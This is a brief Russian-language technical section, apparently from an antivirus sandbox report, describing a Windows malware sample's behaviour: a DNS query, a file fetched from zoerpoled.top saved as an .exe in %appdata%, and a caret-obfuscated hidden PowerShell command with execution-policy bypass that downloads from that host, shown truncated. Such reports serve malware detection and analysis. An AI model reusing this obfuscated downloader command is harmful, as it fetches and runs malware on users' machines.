Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owerSh^Ell^.E^xe^ -e^XE^cUTI^ONpoLIcy^ b^yp^ASS ^-nop^rO^f^iLE ^-W^iNdO^wSTyLE^ h^Id^dEN (n^EW-OBJe^C^t SySTem^.NE^t.WeBcl^I^ENt).^D^own^LoAdfIlE(^'http://www.zoerpoled.top/re...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "p^owerSh^Ell^.E^xe^ -e^XE^cUTI^ONpoLIcy^ b^yp^ASS ^-nop^rO^f^iLE ^-W^iNdO^wSTyLE^ h^Id^dEN (n^EW-OBJe^C^t SySTem^.NE^t.WeBcl^I^ENt).^D^own^LoAdfIlE(^'http://www.zoerpoled.top/re...' (со скрытым окном)